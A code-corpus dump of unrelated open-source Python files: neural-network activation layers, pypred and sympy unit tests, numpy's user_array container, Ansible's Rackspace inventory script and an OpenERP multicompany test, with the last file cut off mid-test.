            # backward_compute can multiply it with the reshaped 4-D delta.
            # (Previously this used last_layer.value, leaving self.images
            # flat (m, c*h*w) and breaking the conv backward pass shapes --
            # TanhLayer and ReLuLayer both use last_layer.images here.)
            self.images = 1.0/(1+np.exp(-self.last_layer.images))
            self.value = self.images.reshape(m,self.channel*self.height*self.width)
        else:
            self.value = 1.0/(1+np.exp(-self.last_layer.value))
    def backward_compute(self):
        if self.last_layer.type == CONV_TYPE:
            m = np.size(self.images,0)
            self.delta = self.delta.reshape(m, self.channel, self.height, self.width)
            # s'(x) = s(x) * (1 - s(x))
            self.last_layer.delta = self.delta*self.images*(1-self.images)
        else:
            self.last_layer.delta = self.delta * self.value * (1-self.value)
class TanhLayer(ActivateLayer):
    """Hyperbolic-tangent activation."""
    def __init__(self):
        pass
    def forward_compute(self):
        if self.last_layer.type == CONV_TYPE:
            m = np.size(self.last_layer.images, 0)
            self.images = np.tanh(self.last_layer.images)
            self.value = self.images.reshape(m, self.channel*self.height*self.width)
        else:
            self.value = np.tanh(self.last_layer.value)
    def backward_compute(self):
        # Fix: compare the layer *type* against CONV_TYPE, not the images
        # array (comparing an ndarray is elementwise / falsy-for-None and
        # never selected the conv branch as intended).
        if self.last_layer.type == CONV_TYPE:
            m = np.size(self.images, 0)
            self.delta = self.delta.reshape(m, self.channel, self.height, self.width)
            # tanh'(x) = 1 - tanh(x)**2
            self.last_layer.delta = self.delta*(1-self.images**2)
        else:
            self.last_layer.delta = self.delta*(1-self.value**2)
class ReLuLayer(ActivateLayer):
    """(Scaled) ReLU activation: max(0, alpha * x)."""
    alpha = 1
    def __init__(self):
        pass
    def forward_compute(self):
        if self.last_layer.type == CONV_TYPE:
            m = np.size(self.last_layer.images, 0)
            self.images = np.maximum(0, self.alpha*self.last_layer.images)
            self.value = self.images.reshape(m, self.channel*self.height*self.width)
        else:
            self.value = np.maximum(0,self.alpha*self.last_layer.value)
    def backward_compute(self):
        m = np.size(self.value,0)
        if self.last_layer.type == CONV_TYPE:
            self.delta = self.delta.reshape(m, self.channel, self.height, self.width)
            # Gradient is alpha where the activation fired, zero elsewhere.
            grad = np.where(self.images > 0, self.alpha, 0)
            self.last_layer.delta = self.delta*grad
        else:
            grad = np.where(self.value > 0, self.alpha, 0)
            self.last_layer.delta = self.delta*grad
class OutputLayer(BaseLayer):
    """Terminal layer: computes the cost between hypothesis and target."""
    h = None #hippothesis (network output)
    y = None #standard output (expected target)
    lamb = 0 # regularisation weight (currently unused)
    costFunc = None # bound cost method selected by init()
    costValue = None # last computed cost
    def __init__(self):
        pass
    def LMS(self):
        """Mean squared error: sum((h - y)**2) / (2m)."""
        res = np.sum((self.h-self.y)**2)/(2.0*np.size(self.y, 0))
        self.costValue = res
        return res
    def SoftMax(self):
        """Cross-entropy cost for softmax outputs: -sum(y * log h) / m."""
        self.costValue = -np.sum(self.y*np.log(self.h))/(1.0*np.size(self.y, 0))
        return self.costValue
    def init(self,costFuncName='LMS'):
        """Select the cost function by name; returns True if recognised."""
        if costFuncName == 'LMS':
            self.costFunc = self.LMS
            return True
        elif costFuncName == 'SoftMax':
            self.costFunc = self.SoftMax
            return True
        return False
    def setY(self, y):
        self.y = y
    def forward_compute(self):
        if self.costFunc == self.LMS:
            self.h = self.last_layer.value
        elif self.costFunc == self.SoftMax:
            m = np.size(self.last_layer.value,0)
            # Compute the exponentials once (the original evaluated np.exp
            # over the whole batch twice).
            exp_scores = np.exp(self.last_layer.value)
            fenmu = np.sum(exp_scores,axis=1).reshape(m,1)
            self.h = exp_scores/fenmu
        self.costValue=self.costFunc()
    def backward_compute(self):
        # Both supported costs share this gradient at the output.
        self.last_layer.delta = self.h-self.y
| gpl-3.0 |
grigi/pypred | tests/unit/test_compact.py | 2 | 1849 | from pypred import ast, compact
class TestCompact(object):
    """Unit tests for pypred's AST compaction and node naming."""
    def test_compact(self):
        # Build (foo > 42) or (foo < 42) with duplicated leaf nodes.
        lit = ast.Literal('foo')
        num = ast.Number(42)
        gt_node = ast.CompareOperator('>', lit, num)
        dup_lit = ast.Literal('foo')
        dup_num = ast.Number(42)
        lt_node = ast.CompareOperator('<', dup_lit, dup_num)
        tree = ast.LogicalOperator('or', gt_node, lt_node)
        compact.compact(tree)
        # After compaction, duplicate literal/number leaves collapse to
        # single shared objects.
        assert lit is tree.right.left
        assert num is tree.right.right

    def test_names(self):
        lit = ast.Literal("foo")
        assert ("Literal", "foo") == compact.node_name(lit)
        num = ast.Number(12)
        assert ("Number", 12) == compact.node_name(num)
        const = ast.Constant(True)
        assert ("Constant", True) == compact.node_name(const)
        regex = ast.Regex("^tubez$")
        assert ("Regex", "^tubez$") == compact.node_name(regex)
        undef = ast.Undefined()
        assert "Undefined" == compact.node_name(undef)
        empty = ast.Empty()
        assert "Empty" == compact.node_name(empty)
        negate = ast.NegateOperator(const)
        assert ("NegateOperator", ("Constant", True)) == compact.node_name(negate)
        cmp_node = ast.CompareOperator('=', lit, num)
        assert ("CompareOperator", "=", ("Literal", "foo"), ("Number", 12)) == compact.node_name(cmp_node)
        match_node = ast.MatchOperator(lit, regex)
        assert ("MatchOperator", ("Literal", "foo"), ("Regex", "^tubez$")) == compact.node_name(match_node)
        contains = ast.ContainsOperator(lit, num)
        assert ("ContainsOperator", ("Literal", "foo"), ("Number", 12.0)) == compact.node_name(contains)
        logical = ast.LogicalOperator('and', lit, const)
        assert ("LogicalOperator", "and", ("Literal", "foo"), ("Constant", True)) == compact.node_name(logical)
| bsd-3-clause |
dato-code/numpy | numpy/lib/user_array.py | 111 | 7764 | """
Standard container-class for easy multiple-inheritance.
Try to inherit from the ndarray instead of using this class as this is not
complete.
"""
from __future__ import division, absolute_import, print_function
from numpy.core import (
array, asarray, absolute, add, subtract, multiply, divide,
remainder, power, left_shift, right_shift, bitwise_and, bitwise_or,
bitwise_xor, invert, less, less_equal, not_equal, equal, greater,
greater_equal, shape, reshape, arange, sin, sqrt, transpose
)
from numpy.compat import long
class container(object):
    """Wrap an ndarray and delegate operators/attribute access to it.

    Kept for easy multiple inheritance; subclassing ndarray directly is
    the recommended modern approach (see module docstring).
    """
    def __init__(self, data, dtype=None, copy=True):
        self.array = array(data, dtype, copy=copy)
    def __repr__(self):
        # Render as ClassName(...) re-using ndarray's repr body.
        if len(self.shape) > 0:
            return self.__class__.__name__ + repr(self.array)[len("array"):]
        else:
            return self.__class__.__name__ + "(" + repr(self.array) + ")"
    def __array__(self, t=None):
        # Support numpy coercion (np.asarray); honours an optional dtype.
        if t:
            return self.array.astype(t)
        return self.array
    # Array as sequence
    def __len__(self):
        return len(self.array)
    def __getitem__(self, index):
        return self._rc(self.array[index])
    def __getslice__(self, i, j):
        # Python 2 slicing protocol (unused on Python 3).
        return self._rc(self.array[i:j])
    def __setitem__(self, index, value):
        self.array[index] = asarray(value, self.dtype)
    def __setslice__(self, i, j, value):
        # Python 2 slicing protocol (unused on Python 3).
        self.array[i:j] = asarray(value, self.dtype)
    # Arithmetic operators: each returns a re-wrapped result via _rc; the
    # in-place variants (__iadd__ etc.) mutate self.array and return self.
    def __abs__(self):
        return self._rc(absolute(self.array))
    def __neg__(self):
        return self._rc(-self.array)
    def __add__(self, other):
        return self._rc(self.array + asarray(other))
    __radd__ = __add__
    def __iadd__(self, other):
        add(self.array, other, self.array)
        return self
    def __sub__(self, other):
        return self._rc(self.array - asarray(other))
    def __rsub__(self, other):
        return self._rc(asarray(other) - self.array)
    def __isub__(self, other):
        subtract(self.array, other, self.array)
        return self
    def __mul__(self, other):
        return self._rc(multiply(self.array, asarray(other)))
    __rmul__ = __mul__
    def __imul__(self, other):
        multiply(self.array, other, self.array)
        return self
    def __div__(self, other):
        # Python 2 division protocol (Python 3 uses __truediv__, not defined
        # here -- NOTE(review): true division falls back to __array__ coercion).
        return self._rc(divide(self.array, asarray(other)))
    def __rdiv__(self, other):
        return self._rc(divide(asarray(other), self.array))
    def __idiv__(self, other):
        divide(self.array, other, self.array)
        return self
    def __mod__(self, other):
        return self._rc(remainder(self.array, other))
    def __rmod__(self, other):
        return self._rc(remainder(other, self.array))
    def __imod__(self, other):
        remainder(self.array, other, self.array)
        return self
    def __divmod__(self, other):
        return (self._rc(divide(self.array, other)),
                self._rc(remainder(self.array, other)))
    def __rdivmod__(self, other):
        return (self._rc(divide(other, self.array)),
                self._rc(remainder(other, self.array)))
    def __pow__(self, other):
        return self._rc(power(self.array, asarray(other)))
    def __rpow__(self, other):
        return self._rc(power(asarray(other), self.array))
    def __ipow__(self, other):
        power(self.array, other, self.array)
        return self
    # Bit-shift and bitwise operators.
    def __lshift__(self, other):
        return self._rc(left_shift(self.array, other))
    def __rshift__(self, other):
        return self._rc(right_shift(self.array, other))
    def __rlshift__(self, other):
        return self._rc(left_shift(other, self.array))
    def __rrshift__(self, other):
        return self._rc(right_shift(other, self.array))
    def __ilshift__(self, other):
        left_shift(self.array, other, self.array)
        return self
    def __irshift__(self, other):
        right_shift(self.array, other, self.array)
        return self
    def __and__(self, other):
        return self._rc(bitwise_and(self.array, other))
    def __rand__(self, other):
        return self._rc(bitwise_and(other, self.array))
    def __iand__(self, other):
        bitwise_and(self.array, other, self.array)
        return self
    def __xor__(self, other):
        return self._rc(bitwise_xor(self.array, other))
    def __rxor__(self, other):
        return self._rc(bitwise_xor(other, self.array))
    def __ixor__(self, other):
        bitwise_xor(self.array, other, self.array)
        return self
    def __or__(self, other):
        return self._rc(bitwise_or(self.array, other))
    def __ror__(self, other):
        return self._rc(bitwise_or(other, self.array))
    def __ior__(self, other):
        bitwise_or(self.array, other, self.array)
        return self
    def __pos__(self):
        return self._rc(self.array)
    def __invert__(self):
        return self._rc(invert(self.array))
    def _scalarfunc(self, func):
        # Convert a rank-0 container to a Python scalar via func.
        if len(self.shape) == 0:
            return func(self[0])
        else:
            raise TypeError(
                "only rank-0 arrays can be converted to Python scalars.")
    def __complex__(self):
        return self._scalarfunc(complex)
    def __float__(self):
        return self._scalarfunc(float)
    def __int__(self):
        return self._scalarfunc(int)
    def __long__(self):
        # Python 2 only; `long` comes from numpy.compat.
        return self._scalarfunc(long)
    def __hex__(self):
        return self._scalarfunc(hex)
    def __oct__(self):
        return self._scalarfunc(oct)
    # Comparison operators return element-wise boolean containers.
    def __lt__(self, other):
        return self._rc(less(self.array, other))
    def __le__(self, other):
        return self._rc(less_equal(self.array, other))
    def __eq__(self, other):
        return self._rc(equal(self.array, other))
    def __ne__(self, other):
        return self._rc(not_equal(self.array, other))
    def __gt__(self, other):
        return self._rc(greater(self.array, other))
    def __ge__(self, other):
        return self._rc(greater_equal(self.array, other))
    def copy(self):
        return self._rc(self.array.copy())
    def tostring(self):
        return self.array.tostring()
    def byteswap(self):
        return self._rc(self.array.byteswap())
    def astype(self, typecode):
        return self._rc(self.array.astype(typecode))
    def _rc(self, a):
        # Re-wrap results in this class, except rank-0 (scalar) values.
        if len(shape(a)) == 0:
            return a
        else:
            return self.__class__(a)
    def __array_wrap__(self, *args):
        return self.__class__(args[0])
    def __setattr__(self, attr, value):
        # 'array' is stored on the wrapper; other attributes are forwarded
        # to the wrapped ndarray when possible.
        if attr == 'array':
            object.__setattr__(self, attr, value)
            return
        try:
            self.array.__setattr__(attr, value)
        except AttributeError:
            object.__setattr__(self, attr, value)
    # Only called after other approaches fail.
    def __getattr__(self, attr):
        if (attr == 'array'):
            return object.__getattribute__(self, attr)
        return self.array.__getattribute__(attr)
#############################################################
# Test of class container
#############################################################
if __name__ == '__main__':
    # Ad-hoc smoke test exercising the container wrapper when the module is
    # run directly.
    temp = reshape(arange(10000), (100, 100))
    ua = container(temp)
    # new object created begin test
    print(dir(ua))
    print(shape(ua), ua.shape) # I have changed Numeric.py
    # Slicing a container copies (unlike ndarray views) -- demonstrated below.
    ua_small = ua[:3, :5]
    print(ua_small)
    # this did not change ua[0,0], which is not normal behavior
    ua_small[0, 0] = 10
    print(ua_small[0, 0], ua[0, 0])
    print(sin(ua_small) / 3. * 6. + sqrt(ua_small ** 2))
    print(less(ua_small, 103), type(less(ua_small, 103)))
    print(type(ua_small * reshape(arange(15), shape(ua_small))))
    print(reshape(ua_small, (5, 3)))
    print(transpose(ua_small))
| bsd-3-clause |
wenottingham/ansible | contrib/inventory/rax.py | 21 | 16418 | #!/usr/bin/env python
# (c) 2013, Jesse Keating <jesse.keating@rackspace.com,
# Paul Durivage <paul.durivage@rackspace.com>,
# Matt Martz <matt@sivel.net>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Rackspace Cloud Inventory
Authors:
Jesse Keating <jesse.keating@rackspace.com,
Paul Durivage <paul.durivage@rackspace.com>,
Matt Martz <matt@sivel.net>
Description:
Generates inventory that Ansible can understand by making API request to
Rackspace Public Cloud API
When run against a specific host, this script returns variables similar to:
rax_os-ext-sts_task_state
rax_addresses
rax_links
rax_image
rax_os-ext-sts_vm_state
rax_flavor
rax_id
rax_rax-bandwidth_bandwidth
rax_user_id
rax_os-dcf_diskconfig
rax_accessipv4
rax_accessipv6
rax_progress
rax_os-ext-sts_power_state
rax_metadata
rax_status
rax_updated
rax_hostid
rax_name
rax_created
rax_tenant_id
rax_loaded
Configuration:
rax.py can be configured using a rax.ini file or via environment
variables. The rax.ini file should live in the same directory along side
this script.
The section header for configuration values related to this
inventory plugin is [rax]
[rax]
creds_file = ~/.rackspace_cloud_credentials
regions = IAD,ORD,DFW
    environment = prod
meta_prefix = meta
access_network = public
access_ip_version = 4
Each of these configurations also has a corresponding environment variable.
An environment variable will override a configuration file value.
creds_file:
Environment Variable: RAX_CREDS_FILE
An optional configuration that points to a pyrax-compatible credentials
file.
If not supplied, rax.py will look for a credentials file
at ~/.rackspace_cloud_credentials. It uses the Rackspace Python SDK,
and therefore requires a file formatted per the SDK's specifications.
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
regions:
Environment Variable: RAX_REGION
An optional environment variable to narrow inventory search
scope. If used, needs a value like ORD, DFW, SYD (a Rackspace
datacenter) and optionally accepts a comma-separated list.
environment:
Environment Variable: RAX_ENV
A configuration that will use an environment as configured in
~/.pyrax.cfg, see
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
meta_prefix:
Environment Variable: RAX_META_PREFIX
Default: meta
A configuration that changes the prefix used for meta key/value groups.
For compatibility with ec2.py set to "tag"
access_network:
Environment Variable: RAX_ACCESS_NETWORK
Default: public
A configuration that will tell the inventory script to use a specific
server network to determine the ansible_ssh_host value. If no address
is found, ansible_ssh_host will not be set. Accepts a comma-separated
list of network names, the first found wins.
access_ip_version:
Environment Variable: RAX_ACCESS_IP_VERSION
Default: 4
A configuration related to "access_network" that will attempt to
determine the ansible_ssh_host value for either IPv4 or IPv6. If no
address is found, ansible_ssh_host will not be set.
Acceptable values are: 4 or 6. Values other than 4 or 6
will be ignored, and 4 will be used. Accepts a comma-separated list,
the first found wins.
Examples:
List server instances
$ RAX_CREDS_FILE=~/.raxpub rax.py --list
List servers in ORD datacenter only
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD rax.py --list
List servers in ORD and DFW datacenters
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD,DFW rax.py --list
Get server details for server named "server.example.com"
$ RAX_CREDS_FILE=~/.raxpub rax.py --host server.example.com
Use the instance private IP to connect (instead of public IP)
$ RAX_CREDS_FILE=~/.raxpub RAX_ACCESS_NETWORK=private rax.py --list
"""
import os
import re
import sys
import argparse
import warnings
import collections
import ConfigParser
from six import iteritems
try:
import json
except ImportError:
import simplejson as json
try:
import pyrax
from pyrax.utils import slugify
except ImportError:
sys.exit('pyrax is required for this module')
from time import time
from ansible.constants import get_config, mk_boolean
# Attribute types serialised as plain data by to_dict() (Python 2 basestring).
NON_CALLABLES = (basestring, bool, dict, int, list, type(None))
def load_config_file():
    """Parse rax.ini next to this script; return None if it is unreadable."""
    parser = ConfigParser.ConfigParser()
    ini_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                            'rax.ini')
    try:
        parser.read(ini_path)
    except ConfigParser.Error:
        return None
    return parser
# Module-level rax.ini configuration, parsed once at import (None if missing).
p = load_config_file()
def rax_slugify(value):
    """Turn an attribute name into a rax_-prefixed, lowercase slug.

    Non-word characters (except '-') become underscores; leading underscores
    are stripped before the 'rax_' prefix is applied.
    """
    # Raw string for the regex: '\w' in a plain string is an invalid escape
    # (DeprecationWarning on modern Python).
    return 'rax_%s' % (re.sub(r'[^\w-]', '_', value).lower().lstrip('_'))
def to_dict(obj):
    """Map an object's public, non-callable attributes to a slugged dict."""
    result = {}
    for attr in dir(obj):
        val = getattr(obj, attr)
        # Keep only plain data attributes that are not private/dunder.
        if isinstance(val, NON_CALLABLES) and not attr.startswith('_'):
            result[rax_slugify(attr)] = val
    return result
def host(regions, hostname):
    """Print JSON hostvars for the server matching `hostname` across regions."""
    hostvars = {}
    for region in regions:
        # Connect to the region
        cs = pyrax.connect_to_cloudservers(region=region)
        for server in cs.servers.list():
            if server.name != hostname:
                continue
            hostvars.update(to_dict(server))
            # And finally, add an IP address
            hostvars['ansible_ssh_host'] = server.accessIPv4
    print(json.dumps(hostvars, sort_keys=True, indent=4))
def _list_into_cache(regions):
    """Build the full inventory (groups + hostvars) and write it to the cache.

    Queries every region's cloud servers, derives groups from region, flavor,
    image, and metadata, resolves each server's ansible_ssh_host from the
    configured networks/IP versions, and dumps the result as JSON.
    """
    groups = collections.defaultdict(list)
    hostvars = collections.defaultdict(dict)
    images = {}
    cbs_attachments = collections.defaultdict(dict)
    prefix = get_config(p, 'rax', 'meta_prefix', 'RAX_META_PREFIX', 'meta')
    try:
        # Ansible 2.3+
        networks = get_config(p, 'rax', 'access_network',
                              'RAX_ACCESS_NETWORK', 'public', value_type='list')
    except TypeError:
        # Ansible 2.2.x and below
        networks = get_config(p, 'rax', 'access_network',
                              'RAX_ACCESS_NETWORK', 'public', islist=True)
    try:
        try:
            ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
                                              'RAX_ACCESS_IP_VERSION', 4, value_type='list'))
        except TypeError:
            ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
                                              'RAX_ACCESS_IP_VERSION', 4, islist=True))
    except:
        # Any parse failure falls back to IPv4 only.
        ip_versions = [4]
    else:
        # Silently drop anything that is not 4 or 6, defaulting to [4].
        ip_versions = [v for v in ip_versions if v in [4, 6]]
        if not ip_versions:
            ip_versions = [4]
    # Go through all the regions looking for servers
    for region in regions:
        # Connect to the region
        cs = pyrax.connect_to_cloudservers(region=region)
        if cs is None:
            warnings.warn(
                'Connecting to Rackspace region "%s" has caused Pyrax to '
                'return None. Is this a valid region?' % region,
                RuntimeWarning)
            continue
        for server in cs.servers.list():
            # Create a group on region
            groups[region].append(server.name)
            # Check if group metadata key in servers' metadata
            group = server.metadata.get('group')
            if group:
                groups[group].append(server.name)
            for extra_group in server.metadata.get('groups', '').split(','):
                if extra_group:
                    groups[extra_group].append(server.name)
            # Add host metadata
            for key, value in to_dict(server).items():
                hostvars[server.name][key] = value
            hostvars[server.name]['rax_region'] = region
            for key, value in iteritems(server.metadata):
                groups['%s_%s_%s' % (prefix, key, value)].append(server.name)
            groups['instance-%s' % server.id].append(server.name)
            groups['flavor-%s' % server.flavor['id']].append(server.name)
            # Handle boot from volume
            if not server.image:
                # Lazily fetch the region's bootable volume attachments once.
                if not cbs_attachments[region]:
                    cbs = pyrax.connect_to_cloud_blockstorage(region)
                    for vol in cbs.list():
                        if mk_boolean(vol.bootable):
                            for attachment in vol.attachments:
                                metadata = vol.volume_image_metadata
                                server_id = attachment['server_id']
                                cbs_attachments[region][server_id] = {
                                    'id': metadata['image_id'],
                                    'name': slugify(metadata['image_name'])
                                }
                image = cbs_attachments[region].get(server.id)
                if image:
                    server.image = {'id': image['id']}
                    hostvars[server.name]['rax_image'] = server.image
                    hostvars[server.name]['rax_boot_source'] = 'volume'
                    images[image['id']] = image['name']
            else:
                hostvars[server.name]['rax_boot_source'] = 'local'
            try:
                # Group by human-readable image name when we already know it.
                imagegroup = 'image-%s' % images[server.image['id']]
                groups[imagegroup].append(server.name)
                groups['image-%s' % server.image['id']].append(server.name)
            except KeyError:
                try:
                    image = cs.images.get(server.image['id'])
                except cs.exceptions.NotFound:
                    groups['image-%s' % server.image['id']].append(server.name)
                else:
                    images[image.id] = image.human_id
                    groups['image-%s' % image.human_id].append(server.name)
                    groups['image-%s' % server.image['id']].append(server.name)
            # And finally, add an IP address
            ansible_ssh_host = None
            # use accessIPv[46] instead of looping address for 'public'
            for network_name in networks:
                if ansible_ssh_host:
                    break
                if network_name == 'public':
                    for version_name in ip_versions:
                        if ansible_ssh_host:
                            break
                        if version_name == 6 and server.accessIPv6:
                            ansible_ssh_host = server.accessIPv6
                        elif server.accessIPv4:
                            ansible_ssh_host = server.accessIPv4
                if not ansible_ssh_host:
                    addresses = server.addresses.get(network_name, [])
                    for address in addresses:
                        for version_name in ip_versions:
                            if ansible_ssh_host:
                                break
                            if address.get('version') == version_name:
                                ansible_ssh_host = address.get('addr')
                                break
            if ansible_ssh_host:
                hostvars[server.name]['ansible_ssh_host'] = ansible_ssh_host
    if hostvars:
        groups['_meta'] = {'hostvars': hostvars}
    with open(get_cache_file_path(regions), 'w') as cache_file:
        json.dump(groups, cache_file)
def get_cache_file_path(regions):
    """Return the per-user cache path keyed on username and region list."""
    region_key = '.'.join(reg.strip().lower() for reg in regions)
    cache_dir = os.path.join(os.path.expanduser("~"), '.ansible', 'tmp')
    # Ensure ~/.ansible/tmp exists before handing back a path inside it.
    if not os.path.exists(cache_dir):
        os.makedirs(cache_dir)
    return os.path.join(cache_dir,
                        'ansible-rax-%s-%s.cache' % (
                            pyrax.identity.username, region_key))
def _list(regions, refresh_cache=True):
    """Print the grouped inventory, rebuilding the cache when stale/forced."""
    cache_max_age = int(get_config(p, 'rax', 'cache_max_age',
                                   'RAX_CACHE_MAX_AGE', 600))
    cache_path = get_cache_file_path(regions)
    # Rebuild when missing, explicitly requested, or older than max age.
    if (not os.path.exists(cache_path) or
            refresh_cache or
            (time() - os.stat(cache_path)[-1]) > cache_max_age):
        _list_into_cache(regions)
    with open(cache_path, 'r') as cache_file:
        groups = json.load(cache_file)
    print(json.dumps(groups, sort_keys=True, indent=4))
def parse_args():
    """Parse command-line options: exactly one of --list/--host, plus
    an optional --refresh-cache flag."""
    parser = argparse.ArgumentParser(description='Ansible Rackspace Cloud '
                                                 'inventory module')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('--list', action='store_true',
                       help='List active servers')
    group.add_argument('--host', help='List details about the specific host')
    # Fixed: the original implicit string concatenation produced
    # "requests toRackSpace" (missing space between the fragments).
    parser.add_argument('--refresh-cache', action='store_true', default=False,
                        help=('Force refresh of cache, making API requests '
                              'to RackSpace (default: False - use cache files)'))
    return parser.parse_args()
def setup():
    """Authenticate against Rackspace via pyrax and return the region list.

    Credential sources, in order: RAX_CREDS_FILE (env/config), then
    ~/.rackspace_cloud_credentials, then a pyrax keyring username.
    Exits the process on authentication failure or unsupported region.
    """
    default_creds_file = os.path.expanduser('~/.rackspace_cloud_credentials')

    env = get_config(p, 'rax', 'environment', 'RAX_ENV', None)
    if env:
        pyrax.set_environment(env)

    keyring_username = pyrax.get_setting('keyring_username')

    # Attempt to grab credentials from environment first
    creds_file = get_config(p, 'rax', 'creds_file',
                            'RAX_CREDS_FILE', None)
    if creds_file is not None:
        creds_file = os.path.expanduser(creds_file)
    else:
        # But if that fails, use the default location of
        # ~/.rackspace_cloud_credentials
        if os.path.isfile(default_creds_file):
            creds_file = default_creds_file
        elif not keyring_username:
            # No usable credential source at all: abort.
            sys.exit('No value in environment variable %s and/or no '
                     'credentials file at %s'
                     % ('RAX_CREDS_FILE', default_creds_file))

    identity_type = pyrax.get_setting('identity_type')
    pyrax.set_setting('identity_type', identity_type or 'rackspace')

    region = pyrax.get_setting('region')

    try:
        if keyring_username:
            pyrax.keyring_auth(keyring_username, region=region)
        else:
            pyrax.set_credential_file(creds_file, region=region)
    except Exception as e:
        # NOTE(review): e.message is Python-2 only; str(e) would be the
        # portable spelling -- confirm before changing the exit text.
        sys.exit("%s: %s" % (e, e.message))

    regions = []
    if region:
        # An explicitly configured region wins outright.
        regions.append(region)
    else:
        try:
            # Ansible 2.3+
            region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
                                     value_type='list')
        except TypeError:
            # Ansible 2.2.x and below
            region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
                                     islist=True)

        for region in region_list:
            region = region.strip().upper()
            if region == 'ALL':
                # 'ALL' short-circuits to every region pyrax knows about.
                regions = pyrax.regions
                break
            elif region not in pyrax.regions:
                sys.exit('Unsupported region %s' % region)
            elif region not in regions:
                regions.append(region)

    return regions
def main():
    """Entry point: authenticate, then dispatch to --list or --host."""
    options = parse_args()
    regions = setup()
    if options.list:
        _list(regions, refresh_cache=options.refresh_cache)
    elif options.host:
        host(regions, options.host)
    sys.exit(0)


if __name__ == '__main__':
    main()
| gpl-3.0 |
patriciolobos/desa8 | openerp/addons/mrp/tests/test_multicompany.py | 374 | 2660 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.tests import common
class TestMrpMulticompany(common.TransactionCase):
    """Checks that mrp.production defaults resolve without access errors
    for a user whose company is not the main one."""

    def setUp(self):
        """Create a stock-manager user belonging to the second company."""
        super(TestMrpMulticompany, self).setUp()
        cr, uid = self.cr, self.uid

        # Useful models
        self.ir_model_data = self.registry('ir.model.data')
        self.res_users = self.registry('res.users')
        self.stock_location = self.registry('stock.location')

        group_user_id = self.registry('ir.model.data').xmlid_to_res_id(cr, uid, 'base.group_user')
        group_stock_manager_id = self.registry('ir.model.data').xmlid_to_res_id(cr, uid, 'stock.group_stock_manager')
        company_2_id = self.registry('ir.model.data').xmlid_to_res_id(cr, uid, 'stock.res_company_1')
        self.multicompany_user_id = self.res_users.create(cr, uid,
            {'name': 'multicomp', 'login': 'multicomp',
             'groups_id': [(6, 0, [group_user_id, group_stock_manager_id])],
             'company_id': company_2_id, 'company_ids': [(6, 0, [company_2_id])]})

    def test_00_multicompany_user(self):
        """check no error on getting default mrp.production values in multicompany setting"""
        cr, uid, context = self.cr, self.multicompany_user_id, {}
        fields = ['location_src_id', 'location_dest_id']
        defaults = self.stock_location.default_get(cr, uid, ['location_id', 'location_dest_id', 'type'], context)
        for field in fields:
            if defaults.get(field):
                try:
                    self.stock_location.check_access_rule(cr, uid, [defaults[field]], 'read', context)
                except Exception as exc:
                    # FIX: 'except ... as' (not 'except Exception, exc') keeps
                    # the module importable on Python 3, and self.fail -- unlike
                    # a bare assert -- is not stripped under python -O.
                    self.fail("unreadable location %s: %s" % (field, exc))
| agpl-3.0 |
jerli/sympy | sympy/printing/tests/test_mathml.py | 62 | 16917 | from sympy import diff, Integral, Limit, sin, Symbol, Integer, Rational, cos, \
tan, asin, acos, atan, sinh, cosh, tanh, asinh, acosh, atanh, E, I, oo, \
pi, GoldenRatio, EulerGamma, Sum, Eq, Ne, Ge, Lt, Float
from sympy.core.compatibility import u
from sympy.printing.mathml import mathml, MathMLPrinter
from sympy.utilities.pytest import raises
# Shared fixtures: two plain symbols and a default content-MathML printer
# reused by every test below.
x = Symbol('x')
y = Symbol('y')
mp = MathMLPrinter()
def test_printmethod():
    """doprint serialises a simple sum as content MathML."""
    expr = 1 + x
    assert mp.doprint(expr) == '<apply><plus/><ci>x</ci><cn>1</cn></apply>'
def test_mathml_core():
    """Exercise the basic <apply> structure for Add, Pow and Mul."""
    mml_1 = mp._print(1 + x)
    assert mml_1.nodeName == 'apply'
    nodes = mml_1.childNodes
    assert len(nodes) == 3
    assert nodes[0].nodeName == 'plus'
    assert nodes[0].hasChildNodes() is False
    assert nodes[0].nodeValue is None
    # Operand order inside an Add is not guaranteed, so accept either order.
    assert nodes[1].nodeName in ['cn', 'ci']
    if nodes[1].nodeName == 'cn':
        assert nodes[1].childNodes[0].nodeValue == '1'
        assert nodes[2].childNodes[0].nodeValue == 'x'
    else:
        assert nodes[1].childNodes[0].nodeValue == 'x'
        assert nodes[2].childNodes[0].nodeValue == '1'

    mml_2 = mp._print(x**2)
    assert mml_2.nodeName == 'apply'
    nodes = mml_2.childNodes
    assert nodes[1].childNodes[0].nodeValue == 'x'
    assert nodes[2].childNodes[0].nodeValue == '2'

    mml_3 = mp._print(2*x)
    assert mml_3.nodeName == 'apply'
    nodes = mml_3.childNodes
    assert nodes[0].nodeName == 'times'
    assert nodes[1].childNodes[0].nodeValue == '2'
    assert nodes[2].childNodes[0].nodeValue == 'x'

    # A Float coefficient keeps its textual form ('1.0').
    mml = mp._print(Float(1.0, 2)*x)
    assert mml.nodeName == 'apply'
    nodes = mml.childNodes
    assert nodes[0].nodeName == 'times'
